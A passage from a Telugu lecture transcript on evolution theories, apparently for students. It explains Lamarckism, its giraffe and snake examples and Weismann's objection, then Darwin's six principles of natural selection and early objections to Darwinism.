ఆహారం కానీ అవి తీసుకునేటువంటి దాంట్లో మార్పులు కనుక ఏర్పడితే జీవి యొక్క ప్రవర్తనలో మార్పు ఏర్పడుతుంది. ఆ ప్రవర్తనలో మార్పు ఏం చేస్తుందంటే చివరికి ఇంటర్నల్గా అంతర్గతంగా ఉన్నటువంటి శరీర ధర్మక్రియలలో కూడా మార్పుని కలగజేస్తుంది. సో ఇక్కడ ఏం చెప్తున్నామంటే మనం ఉపయుక్తత నిరుపయుక్తత సూత్రం ఆధారంగా శరీర భాగాలు ఏర్పడటం, అంటే ఏదైతే అవయవం ఎక్కువగా ఉపయోగపడిందో ఉపయోగపడినటువంటి అవయవం అభివృద్ధి చెందుతుంది. అంతకుముందున్నటువంటి జీవికి దానికి తేడా చూసినప్పుడు ఆ అవయవం ఎక్కువ ఉపయోగపడింది కాబట్టి ఆ అవయవంలో మార్పు వచ్చింది. నిరుపయుక్తత తీసుకున్నప్పుడు అంతకుముందున్నటువంటి జీవులు తీసుకున్నప్పుడు అదే జాతికి చెందినటువంటి అంతకుముందున్నటువంటి జీవిని తీసుకున్నప్పుడు ఈ జీవికి తీసుకున్నప్పుడు ఈ జీవిలో ఈ అవయవం యొక్క ఉపయోగం అనేది తక్కువైంది కాబట్టి ఈ అవయవము పనికి రాకుండా, అంటే దాని ఏమంటే మనం అవశేష అవయవంగా లేదంటే తక్కువ స్థాయిలో వినియోగించటం వల్ల దాని యొక్క పరిణామం ఏమైంది క్రమంగా తగ్గుతూ జరిగింది. ఆ కారణంగా ఏమవుతాయి, మొదటగా మనకి మార్పులు లేదా వైవిధ్యాలు ఏర్పడ్డాయి. సో ఇక్కడ మనం వైవిధ్యాలు అనేవి జీవ పరిణామానికి సంబంధించి ప్రమాణంగా లామార్క్ సూత్రం ప్రకారం మనం తీసుకోవచ్చు. సో వైవిధ్యం అనేది ఎట్లా వచ్చిందంటే రెండు ప్రక్రియల ద్వారా. మొదటిది ఉపయుక్తత, రెండోది నిరుపయుక్తత. ఉపయుక్తత కారణంగా ఏమవుతోంది, అవయవం ఎక్కువగా ఉపయోగించబడి అవయవంలో మార్పు ఏర్పడి క్రొత్త అవయవంగా మార్పు చెందేటటువంటి ప్రక్రియ అది ఉపయుక్తత. నిరుపయుక్తతలో ఏమవుతోంది, అవయవం తక్కువగా కనిష్ట స్థాయిలో వినియోగించుకోబడి అవయవంలో మార్పు చెంది సాధారణ అవయవానికి దానికి మార్పు ఏర్పడు. సో ఇక్కడ మనం తీసుకున్నప్పుడు ఏమవుతోంది, ఇక్కడ సాధారణ అవయవానికి ఈ మార్పు చెందినటువంటి అవయవానికి మధ్య మనం నిర్దిష్టమైనటువంటి తేడాన్ని చూస్తున్నాం. ఆ తేడానే మనం వైవిధ్యం అని పేర్కొన్నాం. లామార్క్ దృష్ట్యా దాన్ని వైవిధ్యాలు అన్నాడు. ఈ వైవిధ్యాలే జీవ పరిణామానికి సంబంధించి ప్రాథమిక ప్రమాణాలుగా మనం లామార్క్ సిద్ధాంతంలో పేర్కొనడం అనేది జరుగుతుంది. ఒక జీవితకాలంలో ఏర్పరచుకున్నటువంటి ప్రతి లక్షణము భద్రపరచబడి తర్వాతి తరాలకు అందజేయడం జరుగుతుంది. దీన్ని ఆర్జిత గుణాల అనువంశికత అంటాం. లామార్క్ సిద్ధాంతాన్నే మనం ఇందాక చెప్పుకున్నాం, ఆర్జిత గుణాల అనువంశికత అని. ఇప్పుడు ఏదైతే వైవిధ్యం ఒక జీవి పొందినదో, ఏది ఉపయుక్తత కారణంగా కానీ నిరుపయుక్తత కారణంగా కానీ పొందినటువంటి వైవిధ్యాన్ని జీవి ఏం చేస్తుంది,
ఆ తరంలోనే కాకుండా తర్వాతి తరానికి అందచేయడానికి ప్రయత్నం చేస్తుంది మరియు అందిస్తుంది కూడా. ఆ అందించేటటువంటి లక్షణాన్ని, అందించేటటువంటి ప్రక్రియనే మనం ఏమంటున్నామంటే ఆర్జిత గుణాల అనువంశికత. ఇలా అందచేయటం కారణంగానే ఏం జరుగుతుంది అక్కడ, అంతకు ముందున్నటువంటి జాతికి తర్వాత వచ్చినటువంటి తర్వాతి తరానికి మధ్య తేడా అనేది కనిపిస్తుంది. సో జీవులలో వైవిధ్యాలు వాతావరణం వలన ఏర్పడతాయని పేర్కొన్నాడు. కంక్లూజన్ చేసేటప్పుడు ఏం చెప్పాడు లామార్కు, ఈ తేడాలు ఇందాక చెప్పాం కదా, వైవిధ్యాలు, ఉపయుక్తత లేదా నిరుపయుక్తత రెండు కూడా చెప్పాడు. ఆయన చెప్పినటువంటి అంశాలు ఎలా వస్తాయి అన్నాడు, వాతావరణ ప్రభావం. ఆయన చెప్పిందల్లా ప్రాథమిక అంశం ఏంటంటే వాతావరణ ప్రభావం, అంటే చుట్టూ ఉన్నటువంటి వాతావరణంలో సంభవించే మార్పుల కారణంగా జీవులలో మార్పులు వస్తాయి అనేటట్టు ఆయన వాదన. ఒక జాతి చుట్టూ ఉన్నటువంటి వాతావరణం మారినట్లయితే ఆ జీవి అవసరాలు కూడా మారుతాయి. సో ఇందాకే చెప్పుకున్నాం, చుట్టూ ఉన్నటువంటి వాతావరణం అంటే లామార్క్ చెప్పినటువంటి ప్రధానమైనటువంటి అంశం ఏంటంటే వాతావరణం, జీవి చుట్టూ ఉన్నటువంటి వాతావరణం, జీవి ఏదైతే వాతావరణంలో నివసిస్తూ ఉందో ఆ నివసించేటటువంటి వాతావరణంలో గనక మార్పు సంభవిస్తే తప్పనిసరిగా ఆ జీవి యొక్క నిర్మాణం కావచ్చు, లేదా క్రియాశీలత కావచ్చు, బాహ్య నిర్మాణం కావచ్చు, దాంట్లో మార్పు సంభవిస్తుంది అని లామార్క్ వాదన. సో ఈ అవసరాలు ఏవైతే ఉన్నాయో ఆ మారిన అవసరాలకు అనుగుణంగా శరీర భాగాలు ప్రత్యేక ఉపయోగానికి కానీ నిరుపయోగం కానీ దారితీస్తాయి. దాన్నే మనం ఉపయుక్త నిరుపయుక్త సూత్రం అని చెప్పుకున్నాం. సో నిరంతరం ఉపయోగంలో ఉన్నటువంటి శరీర భాగాలు బాగా పెరిగి ఉపయోగించని భాగాలు క్రమంగా క్షీణించిపోతాయి. వీటిని ఏమన్నా మనము ఆర్జిత గుణాలు అంటాం. ఇవి తర్వాతి లక్షణాలకి అందచేయబడతాయి, తర్వాతి తరాలకి. తర్వాత లామార్క్ ఉదాహరణగా ఏం చెప్పాడు, ఉపయుక్తతకి సంబంధించి జిరాఫీని పేర్కొన్నారు, నిరుపయుక్తతకి సంబంధించి పాములను పేర్కొన్నాడు. ఉపయుక్తతకి సంబంధించి జిరాఫీలు ఏం చెప్తారు, జిరాఫీ కూడా ఇప్పుడు ఉన్నటువంటి సాధారణంగా ఉన్నటువంటి లేళ్ళు దుప్పులు ఉన్నాయి చూసారా, అలాగే అదే రకమైనటువంటి జీవి. కాకపోతే ఈ మైదానాలలో, పచ్చిక మైదానాలలో గడ్డి కొరత కారణంగా చెట్లపై ఉన్నటువంటి ఆకులను అందుకునేటటువంటి క్రమంలో మెడను నిరంతరంగా చాచడం వలన పొడవైనటువంటి మెడతో పాటుగా పూర్వాంగాలు కూడా పొడవుగా సాగి పొడవైనటువంటి మెడ కలిగినటువంటి జిరాఫీ అభివృద్ధి చెందిందని చెప్పారు. నిరుపయుక్తతకు సంబంధించి పాములు పేర్కొన్నాడు. పాములు సరీసృపాల్లో ఉన్నటువంటి మనకి మొసళ్ళు కావచ్చు, తాబేళ్లు కావచ్చు, బల్లులు కావచ్చు, వాటికి మళ్ళీ పూర్వాంగాలు చర్మాంగాలు కూడా ఉండేవి. కానీ బొరియలలో నివసించడానికి వీలుగా ఏం చేసినాయి, ఆ ఉపాంగాలు, పూర్వాంగాలు చర్మాంగాలు వాటి యొక్క ఆవశ్యకత లేదు కాబట్టి వాటిని ఉపయోగించుకుంటాం తగ్గించినాయి. ఆ తగ్గించేటటువంటి క్రమంలో ఏమైంది, క్రమక్రమంగా ఆ అవయవాలు క్షీణించి ఆ ఉపాంగాలు లేనటువంటి పాములు అభివృద్ధి చెందినవి ఆయన వాదన. సో ఈ రెండింటిని ఉదాహరణగా లామార్క్ పేర్కొనడం జరిగింది. సో జిరాఫీ మనం పట్టణంలో చూస్తే కనుక ఇక్కడ అంతకుముందు ప్రారంభంలో ఈ జిరాఫీ కూడా ఈ లేళ్ళు దుప్పుల్లాగానే సాధారణంగా మైదానాల్లో ఉన్నటువంటి గడ్డిని తీసుకునేది. తర్వాత క్రమక్రమంగా చెట్ల ఆకులను తినేటటువంటి క్రమంలో మెడను చాచటం మరియు పూర్వాంగాలను కూడా చాచటం అనేటువంటి ప్రక్రియ కారణంగా పొడవైనటువంటి మెడగల జిరాఫీ అభివృద్ధి చెందింది ఆయన వాదన. సో లామార్కిజానికి అభ్యంతరాలు తీసుకుంటే కనుక లామార్క్ చెప్పినటువంటి సిద్ధాంతాలని అగస్ట్ వీజ్మన్ అనేటువంటి శాస్త్రవేత్త నిర్ద్వందంగా తోసిపుచ్చాడు. ఆయన ప్రతిపాదించినటువంటి సిద్ధాంతం ఏంటంటే బీజద్రవ్య సిద్ధాంతం. ఆయన చెప్పేది ఏంటంటే జీవుల దేహంలో ఉండేటువంటి దైహిక కణాలలో ఉండేటటువంటి ద్రవ్యాన్ని దేహద్రవ్యం అంటారు, లైంగిక కణాలలో ఉండేటటువంటి ద్రవ్యాన్ని బీజద్రవ్యం అంటారు. ఈ బీజద్రవ్యంలో సంభవించేటటువంటి మార్పులు మాత్రమే అనువంశికత చెందుతాయి అని పేర్కొంటాడు. ఆయన ఏం చేశాడు, ఉదాహరణగా లామార్క్ సిద్ధాంతం తప్పు అని నిరూపించడానికి ఎలుకలు తీసుకుని ఒక 30 తరాల పాటు తోకను కత్తిరించి వేశాడు. ఇప్పుడు లామార్క్ చెప్పినట్టు తోక అనేది నిరుపయోగమైనప్పుడు తర్వాతి తరంలో తోక అనేది అభివృద్ధి చెందకూడదు కదా, కానీ అలా జరగలేదు. 30 తరాలు చేసినప్పటికీ 31వ తరంలో తిరిగి ఎలుకకు తోకతో పుట్టడం అనేది జరిగింది. ఆ రకంగా అగస్ట్ వీజ్మన్ అనేటువంటి శాస్త్రవేత్త లామార్క్ సిద్ధాంతాన్ని కొన్ని అంశాల దృష్టి అంటే ఉపయుక్త నిరుపయుక్త సూత్రం దృష్ట్యా మాత్రం ఇది సాధ్యము కానటువంటి అంశం, అంటే విజ్ఞాన శాస్త్ర పరంగా తీసుకున్నప్పుడు ఇది సాధ్యము కానటువంటి అంశం అని చెప్పడం లేదు. కానీ
నియో లామార్కిజం అనేటటువంటి అంశాన్ని తీసుకుని శాస్త్రవేత్తలు ఏం చేశారంటే లామార్క్ చెప్పినటువంటి వైవిధ్యాలు మరియు ప్రకృతి ప్రభావం ఈ రెండు అంశాలని పరిగణలోకి తీసుకుని అవి సాధ్యమైనటువంటి అంశాలు, అంటే అవి నిరూపణ యోగ్యమైనటువంటి అంశాలు. ప్రతి జీవి పైన ప్రకృతి ప్రభావం ఉంటుంది. ప్రకృతిలో మార్పుల కారణంగా అవయవాలలో మార్పులు వస్తాయి. అవయవాలలో మార్పుల కారణంగా వైవిధ్యాలు సంభవిస్తాయి. వైవిధ్యం అనేది పరిణామానికి మూల ప్రమాణం కాబట్టి ఆ వైవిధ్యం కారణంగా పరిణామం సాధ్యపడుతుందని తర్వాత కాలంలో నియో లామార్కిజం అని శాస్త్రవేత్తలు నిరూపణ చేయడం అనేది జరిగింది. సో లామార్క్ సిద్ధాంతాన్ని క్రోడీకరించి కనుక మనం చూస్తే కనుక ఈ మొత్తం ఇప్పుడు చెప్పినటువంటి అంశాలన్నింటినీ కూడా మనం ఇక్కడ చూడవచ్చు ఒకే చార్ట్లో. మొట్టమొదట సంభవించేది జీవుల అంతర్గత అవసరాలు. అంతర్గత అవసరాలు వాతావరణంలో ఉన్నటువంటి మార్పులకు దారితీస్తాయి. వాతావరణ మార్పుల్లో దారితీయడం వల్ల కొత్త అవసరాలు ఏర్పడతాయి. కొత్త అవసరాలు అవయవాల నిరుపయుక్తత, అవయవాల ఉపయుక్తతకు దారితీస్తాయి. ఉపయుక్తత కారణంగా అవయవం అభివృద్ధి చెందుతుంది. నిరుపయుక్తత కారణంగా అవయవం అదృశ్యం అవుతుంది. చివరికి ఇది ఆర్జిత గుణాల అనువంశకత దారితీసి కొత్త జాతుల ఆవిర్భావానికి దారితీస్తుంది. సో ఈ పాఠ్యాంశం నుంచి మనకు వచ్చేటటువంటి ప్రశ్నలు తీసుకుంటే కనుక లామార్కిజం గూర్చి ఒక వ్యాసం రాయండి, ఎస్ఐ క్వశ్చన్ రావచ్చు. ఉపయుక్తత సూత్రాన్ని ఉదాహరణతో వివరించండి, 5 మార్కుల ప్రశ్న రావచ్చు. ఆర్జిత గుణాల అనువంశకతను గురించి చర్చించండి. ఆ ప్రశ్నకి రెండింటినీ కలిపి మనం ఆన్సర్ రాస్తాం. థ్యాంక్ యూ. జీవ పరిణామానికి సంబంధించి రెండవ సిద్ధాంతం, రెండవ ప్రతిపాదన చార్లెస్ డార్విన్ ప్రతిపాదించేటువంటి డార్వినిజం గురించి చూద్దాం. సో డార్వినిజం ఈ పాఠ్యాంశం యొక్క ఉద్దేశం ఏంటంటే డార్వినిజం అంటే ఏంటో తెలుసుకోబోతాం. అదే మాదిరిగా ఇందాక చెప్పుకున్నట్లు లామార్కిజం యొక్క విశిష్టత చెప్పినట్లుగానే డార్వినిజం యొక్క విశిష్టతను కూడా చర్చించడం అనేది జరుగుతుంది. సో చార్లెస్ రాబర్ట్ డార్విన్ ఒక ఇంగ్లీష్ శాస్త్రవేత్త. ఈయన ఏం చేశారంటే హెచ్ఎంఎస్ బీగల్ అనేటువంటి నౌకపై 5 సంవత్సరాల పాటు ప్రపంచంలోని అనేక ఖండాలు, ద్వీపకల్పాలు సందర్శించి కొత్త జీవుల ఆవిర్భావానికి సంబంధించి ఏదైతే మౌలిక అంశాలు లామార్క్ ఏదైతే చెప్పున్నాడో చెప్పిన దానికి రుజువుల కోసం ప్రయత్నం చేసేటటువంటి క్రమంలో కొత్త జాతులను పరిశీలించడం అనేది జరిగింది. సో ఈ పటంలో చూస్తే కనుక చార్లెస్ డార్విన్ ఆయన ప్రయాణించినటువంటి హెచ్ఎంఎస్ బీగల్ అనేటువంటి నౌక యొక్క నమూనా, తర్వాత ప్రపంచంలో ఆయన పర్యటించినటువంటి ప్రాంతాలు ఈ రెడ్ లైన్లో కనుక చూస్తే కనుక ఇట్లా ఈ మొత్తం అంతా ప్రపంచంలో ఉన్నటువంటి అన్ని ఐలాండ్స్, ద్వీపాలు, ద్వీపకల్పాలు అన్నింటినీ సందర్శించడం జరిగింది. సో డార్విన్ ఏం చేశాడంటే తన సిద్ధాంతాన్ని జాతుల పుట్టుక, ఆరిజిన్ ఆఫ్ స్పీషీస్ అంటాం అనేటటువంటి వ్యాసంలో ప్రతిపాదించారు. 1859లో డార్విన్ తను కనుగొన్నటువంటి విషయాలను ది ఆరిజిన్ ఆఫ్ స్పీషీస్ బై న్యాచురల్ సెలెక్షన్ అనేటువంటి గ్రంథంగా ప్రచురించారు. సో డార్వినిజంలోనేటువంటి ముఖ్య అంశాలు తీసుకుంటే కనుక 6 అంశాలని ప్రామాణికంగా తీసుకుని డార్వినిజాన్ని ప్రతిపాదించడం జరిగింది. మొదటిది అత్యుత్పత్తి లేదా అధిక ఫలన శక్తి. రెండోది ప్రకృతిలో ప్రతి జాతి జనాభాలో స్థిరత్వం. మూడోది మనుగడ కోసం పోరాటం. 4వది వైవిధ్యాలు. 5వది ప్రకృతి వర్ణం. 6 అల్టిమేట్గా జాతుల ఉత్పత్తి. సో ఈ 6 మౌలిక అంశాల మీద డార్విన్ క్షుణ్ణంగా పరిశోధనలు చేసి, క్షుణ్ణంగా పరిశీలన చేసి
ప్రపంచంలో ఉన్నటువంటి వేరువేరు ప్రాంతాల్లో పరిశీలనలు చేసి ఈ 6 అంశాలను క్రోడీకరించి ఈ 6 అంశాలను విశ్లేషణపూర్వకంగా వివరించి ఈ జీవ పరిణామానికి సంబంధించి డార్వినిజాన్ని ప్రతిపాదన అనేది చేయటం జరిగింది. సో మొదటి ఈ 6 అంశాలని మనం చర్చించాం. ఫస్ట్ అంశం అత్యుత్పత్తి లేదా అధిక ఫలన శక్తి. ప్రతి జాతి కూడా ఏం చేస్తుందంటే తన జాతి యొక్క మనుగడ సాగించడానికి వీలుగా జనాభాను జామితీయ రీతిలో జామెట్రికల్ రేషియోలో ఇంక్రీజ్ చేసుకుంటూ ఉన్నది, పెంచుకుంటూ వెళ్తుంది. ఉదాహరణ తీసుకుంటే కనుక పారమేషియం మరియు ఏనుగు 2 ఎగ్జాంపుల్స్ చెప్పాను, ఇక్కడ చాలా ఉంటాయి. మొదటగా తీసుకుంటే కనుక పారమేషియం ద్విధావిచ్చితి జరుపుకోవడానికి 3 సార్లు ద్విధావిచ్చి జరపడానికి 48 గంటలు పడుతుంది. సో ఒక 9,000 తరాలు అంటే 9,000 జనరేషన్స్ కనుక ద్విధావిచ్చితి జరుపుకుంటే భూమి యొక్క విస్తీర్ణం కన్నా 10,000 రెట్లు అధికంగా పారమేషియంలు భూమండలం మీద అంతా ఉంటాయి. అలాగే ఏనుగు అతి ఎక్కువ గర్భావధి కాలం ఉంటుంది. దానికి కూడా ఒక 900 తరాలు తీసుకుంటే కనుక భూమండలం మొత్తం కూడా ఏనుగులే విస్తరించి ఉండాలి. కానీ అలా జరగటం లేదు. దానికి కారణం ఏంటంటే నెక్స్ట్ చెప్పాడు ఆయన. మొదట చెప్పినటువంటి అంశం ఏంటంటే ప్రతి జాతి కూడా తన జాతిని బతికించుకోవడానికి, తన జాతిని వ్యవస్థలో జీవావరణ వ్యవస్థలో కొనసాగించడానికి వీలుగా ఏం చేస్తుందంటే అధిక ప్రత్యుత్పత్తి అనేటటువంటి ప్రక్రియని చేపడుతుంది. అధిక ప్రత్యుత్పత్తి అనేటటువంటి ప్రక్రియ అంతర్గతంగా నిర్మితమైనటువంటి ఏదైతే అంశం ఉందో దానిని కొనసాగించడానికి ప్రయత్నం చేస్తుంది. అట్లాగే పరాన్నజీవులు కావచ్చు, సాధారణ జీవులు కావచ్చు, ఏవైనా సరే మొదట చేసేటటువంటి అంశం ఏంటంటే ప్రత్యుత్పత్తిని అధికంగా, సంతానాన్ని అధికంగా ఉత్పత్తి చేయడానికి ప్రయత్నం చేయటం. రెండవది స్థిరత్వం. అధికంగా ఉత్పత్తి చేసినంత మాత్రాన అన్ని జీవులు అలాగే ఉంటున్నాయంటే ఉండటంలా. కారణం ఏంటంటే దానికి ప్రతి జాతి జనాభా స్థిరంగా ఉంటుంది. అది కూడా డార్విన్ చెప్పాడు. ఉత్పత్తి అధికంగా అవుతుంది కానీ జనాభా స్థిరంగా ఉంటుంది. దానికి కారణం ఏంటంటే పిల్ల జీవులు ప్రత్యుత్పత్తి దశకు చేరుకోగానే పెద్ద జీవులు మరణించటం. మనం జీవావరణ పిరమిడ్ లేదంటే కనుక వయోవృద్ధి పిరమిడ్లను చూసాం. దాంట్లో చూసినప్పుడు ప్రత్యుత్పత్తి పూర్వదశ జీవులు, ప్రత్యుత్పత్తి దశ జీవులు, ప్రత్యుత్పత్తి పరదశ జీవులని 3 రకాల జీవులుగా వర్గీకరించడం జరిగింది. సో జనాభా ఎందుకు స్థిరంగా ఉంది అనేది మనం పరిగణలోకి కనుక తీసుకుంటే ప్రత్యుత్పత్తి దశకు కనుక సాధారణ జీవులు అంటే చిన్న జీవులు ప్రత్యుత్పత్తి దశకు చేరుకున్నప్పుడు ఆ జనాభాలో ఉన్నటువంటి ప్రత్యుత్పత్తి పరదేశ జీవులు తొలగించబడతాయి, అంటే మరణించడం జరుగుతుంది. ఆ కారణంగా ప్రతి జాతి యొక్క జనాభా స్థిరంగా ఉంటుందని ఆయన ప్రతిపాదించాడు. తర్వాత 3వ అంశం మనుగడ కోసం పోరాటం. స్ట్రగుల్ ఫర్ ఎగ్జిస్టెన్స్ అంటాం దీన్ని. ఇప్పుడు జనాభా అధికమైంది, అధిక జనాభాతో పాటుగా జనాభా కూడా నిర్దిష్టంగా అట్టిపెట్టబడింది. దాంతోపాటుగా ఈ అధిక జనాభా ఫలితంగా జీవుల మధ్య గట్టి పోటీ ఏర్పడుతుంది. ఈ పోటీని డార్విన్ ఏమని పేర్కొన్నారంటే మనుగడ కోసం పోరాటం అని ప్రతిపాదించాడు. సో మనుగడ కోసం పోరాటం మనకి 3 రకాలుగా కనిపిస్తుంది. ఒకటి జాత్యాంతర పోరాటం, ఒకే జాతికి చెందినటువంటి జీవుల మధ్య జరిగేటటువంటి పోటీ. రెండోది జాతి పోరాటం, వేరువేరు జాతులకు చెందినటువంటి జీవుల మధ్య జరిగే పోటీ. మూడోది వాతావరణంతో పోరాటం. సో ఈ 3 కూడా జీవులు ఎల్లప్పుడూ ఎదుర్కొనేటటువంటి పోరాటాలు. అంటే అవి ఆ వ్యవస్థలో, ఆ జీవావరణ వ్యవస్థలో మనుగడ సాగించడానికి వీలుగా అవి చేసేటటువంటి నిరంతర శరీరధర్మపరమైనటువంటి క్రియలు కావచ్చు, లేదంటే కనుక బాహ్య వాతావరణంలో సంబంధించిన మార్పులకు అనుగుణంగా అవి పొందేటటువంటి మార్పులు కూడా కావచ్చు. సో మొదటగా జాత్యంతర పోరాటం చూద్దాం. ఒకే జాతికి చెందినటువంటి జీవుల మధ్య జరిగే పోరాటం, దీనిని జాత్యంతర పోరాటం అంటాం. ఇది దేనికోసం జరుగుతుంది? సాధారణంగా ఆహారం కోసం కానీ ప్రత్యుత్పత్తిలో సంగమం కోసం కానీ జరుగుతుంది. రెండోది జాతి పోరాటం, వేరువేరు జాతులకు చెందిన జీవుల మధ్య పోరాటం. ఇది ప్రధానంగా ఆహారం కోసం జరుగుతూ ఉంటుంది. మూడోది వాతావరణంతో పోరాటం. జీవులు నిరంతరం ప్రకృతి వైపరీత్యాలతో పోరాడుతూనే ఉంటాయి. వైపరీత్యం అంటే ప్రత్యేకంగా మనం ఏం చెప్పుకోకర్లా, వాతావరణంలో సంభవించేటటువంటి మార్పే. ఈ మార్పుకు అనుగుణంగా గనక జీవి గనక మార్పు గనక చెందకపోతే అది ఆ వ్యవస్థ నుంచి తొలగించబడుతుంది.
కాబట్టి అవి పోరాటం చేయాలి. వైవిధ్యం ఏమొచ్చింది, వాతావరణంలో ఏ మార్పు సంభవించింది, ఆ సంభవించిన మార్పుకు అనుగుణంగా అది ఏ రకంగా మార్పుని శరీరధర్మపరంగా కావచ్చు లేదా నిర్మాణ రీత్యా కావచ్చు ఏ రకమైన మార్పును పొందిందో చూసుకోవాలి. అది నెక్స్ట్. తర్వాత వైవిధ్యాలు. అంతకుముందు లామార్క్ చెప్పున్నాడు, ఇక్కడ డార్విన్ కూడా వైవిధ్యాల గురించి మాట్లాడడం జరిగింది. సో ప్రతి జాతికి చెందిన జీవులన్నిటిలోనూ వైవిధ్యాలు ఏర్పడతాయి. వైవిధ్యాలు ఉపయుక్తంగాను నిరుపయుక్తంగాను ఉండవచ్చు. ఉపయుక్త వైవిధ్యాలు ప్రకృతి వలన రక్షింపబడతాయి. సో అంతకుముందు లామార్క్ చెప్పినటువంటి మాటలు ఇక్కడ కూడా వాడటం జరిగింది. ఉపయుక్తం, నిరుపయుక్తం. మార్పు, వైవిధ్యం అనేది సాధ్యపడింది, వైవిధ్యం అనేది జరిగింది. జరిగిన దాంట్లో ఏదైతే ఉపయుక్తం, ఉపయోగపడేటటువంటి వైవిధ్యం ఉంది చూసారా, అది ప్రకృతి చేత రక్షింపబడతాయి. ఈ మాట లామార్క్ వాడలేదు, డార్వినే వాడాడు. ఇక్కడ రోల్ ఆఫ్ ఎన్వైరన్మెంట్, ప్రకృతి యొక్క పాత్రను డార్విన్ వివరించడం వలన డార్విన్ సిద్ధాంతం ఆమోదయోగ్యమైంది. శాస్త్రవేత్తలు అంటే కారణాన్ని అన్వేషించి రుజువు చేయగలిగాడు. వేరే లామార్క్ వచ్చేసరికి చెప్పగలిగాడు తప్పితే రుజువు నిరూపణ అనేది చేయలేపాడు. ఇద్దరికి మధ్య తేడా అది. సో ఇక్కడ ఏం చెప్తున్నాడు, ఏదైతే ఉపయుక్త వైవిధ్యం ఉంది చూసారా, ఆ ఉపయుక్త వైవిధ్యం ప్రకృతి వలన రక్షింపబడతాయి అంటే దానిని సెలెక్ట్ చేసుకుంటుంది. నెక్స్ట్ వస్తుంది చూడండి మనకి. సో దీన్నే ప్రకృతి వర్ణం అంటాం. డార్వినిజం ప్రకారం ఉపయుక్త అనుకూల వైవిధ్యాలు కల జీవులు మాత్రం ప్రకృతి వర్ణం అంటే ప్రకృతి చేత ఎంపిక చేయబడతాయి, సెలెక్ట్ చేయబడతాయి. దీనినే యోగ్యతమాల సార్థక జీవనం అంటాం, సర్వైవల్ ఆఫ్ ది ఫిట్టెస్ట్ అంటాం. సో డార్విన్ ఈ కంక్లూజన్కి వచ్చేసిన తర్వాతే డార్విన్ సిద్ధాంతం యొక్క ఆమోదయోగ్యత అంటే దానికి మన యాక్సెప్టెన్స్ అనేది అధికమైంది. ఏ రకంగా మారింది, మారినటువంటి మార్పుకు అనుగుణంగా అది ఎలా మనుగడ సాగించిందంటే మళ్ళీ అగైన్ ఏం తీసుకొచ్చారు, వాతావరణం లేదా ప్రకృతి అనేది దాన్ని సెలెక్ట్ చేసుకుంటుంది కాబట్టి అది తర్వాత తరాలకు అందజేయబడుతుంది, జాతిలో మార్పు వస్తుంది అనేది చెప్పడం అనేది వివరించడం అనేది జరిగింది. సో దాన్ని ఏమన్నారు, యోగ్యతమాల సాధక జీవనం అంటారు. నెక్స్ట్ లాస్ట్ అంశం డార్విన్ చెప్పిన దాంట్లో జాతుల ఉత్పత్తి. సో అంతకుముందు ఉన్నటువంటి అధిక ఫలన శక్తి కావచ్చు, జనాభాలో స్థిరత్వం కావచ్చు, మనుగడ కోసం పోరాటం కావచ్చు, వైవిధ్యాలు కావచ్చు, ఇవన్నీ కలిస్తే అల్టిమేట్గా కొత్త జాతుల యొక్క ఆవిర్భావం అనేది జరుగుతుంది. సో దీంట్లో ఏం చెప్పారు, మనుగడ కోసం పోరాటం ఫలితంగా ఏర్పడిన జీవులు మరింతగా వాతావరణానికి అనుకూలంగా మారతాయి. ఏదైతే అనుకూలత పొందిందో ఇంకా వాతావరణానికి అనుకూలతగా మారుతుంది. ఈ జీవులలో వైవిధ్యాల వలన తెగ మార్పు జరుగుతుంది. జాతి మార్పు అనేది ఫస్ట్ వాడలేదు, మనం గుర్తుపెట్టుకోవాల్సిన అంశం. కొత్త జాతి పుడతామని చెప్పట్లేదు, జాతికి సంబంధించి ఉపజాతులు, దాని తెగ చిన్న మార్పు ఉంటుంది. ఆ మార్పు కారణంగా ప్రత్యుత్పత్తి పరంగా వేరు చేయబడుతుంది, ఐసోలేట్ చేయబడుతుంది, తర్వాత వస్తుంది అన్నమాట. ఆ మార్పు కారణంగా తెగ మార్పు అన్నాం, జాతి మార్పు అన్న తెగ చిన్న మార్పు, అదేదే వైవిధ్యం. ఈ మార్పుల సంచిత ప్రభావంతో ప్రకృతి వలన వల్ల కొత్త జాతులు ఉత్పత్తి జరుగుతుంది. సో ఈ మార్పుల సంచిత ప్రభావం అంటే ఈ ఏదైతే చిన్న చిన్న మార్పులు వచ్చినాయో ఈ మార్పుల కారణంగా ప్రకృతి వర్ణం వలన అంటే ఏదైతే మనం ఇందా చెప్పుకున్నాం, ప్రకృతి ఎంపిక చేసుకుంటుంది, అవసరమైనటువంటి లక్షణాలు కలిగిన జీవులను గుర్తించి వాటిని వాతావరణంలో అట్టిపెట్టుకుంటుంది, ఆ వ్యవస్థలో మిగతా వాటిని తొలగిస్తుంది. ఆ కారణంగా కొత్త జాతుల ఉత్పత్తి జరుగుతుందని డార్విన్ ప్రతిపాదించడం అనేది జరిగింది. కానీ డార్వినిజానికి కూడా అభ్యంతరాలు వచ్చినాయి. ఏమేమి ఆయన వివరించలేనిది ఏంటి, తరచూ మారే చిన్న చిన్న వైవిధ్యాలను గుర్తి వివరించింది కానీ దైహిక వైవిధ్యాలకు బీజ వైవిధ్యాలకు మధ్య భేదం గుర్తించలేదు. లామార్క్ ఎలా అభ్యంతరాలు వచ్చినాయి, డార్వినిజానికి కూడా అభ్యంతరాలు వచ్చినాయి. దాంట్లో మొదట చెప్పింది ఏంటంటే దైహిక వైవిధ్యాలు బీజ వైవిధ్యాలు అంటే దైహిక కణాల్లో జరిగేటువంటి మార్పులు బీజ కణాల్లో జరిగేటువంటి మార్పులకి మధ్య డిఫరెన్స్ని వివరించలేదని ఇది. అట్లాగే అవశేష అవయవాల గురించి వివరించాల. లామార్కిజంలో అయితే అవయవాలు నిరుపయుక్తంగా ఉండే అవశేష అవయవాలు ఉండిపోయాయని చెప్పారు. బట్ డార్వినిజం దాని గురించి అవి ఏమవుతాయి, ఏంటి, ఎందుకైనా అనేది వివరించలేకపోయింది. తర్వాత డార్విన్ ప్రధాన అంశం యోగ్యతమాల సాధక జీవనం అని చెప్పారు, కాదంటల్లా. కానీ ఎలా ఏర్పడుతున్నాయి, ఏ కారణంగా ఏర్పడుతున్నాయని వివరించలేకపోయింది. తర్వాత కొన్ని జీవులలో ప్రత్యేక శరీర భాగాల గురించి వివరించలేదు. అంటే ఇదేదైతే మనం యోగ్యతమాల సాధక జీవనం తీసుకున్నామో ఆ యోగ్యతమాల సాధక జీవనంలో కొన్ని అవయవాలు గరిష్టంగా అభివృద్ధి చెందాయి,
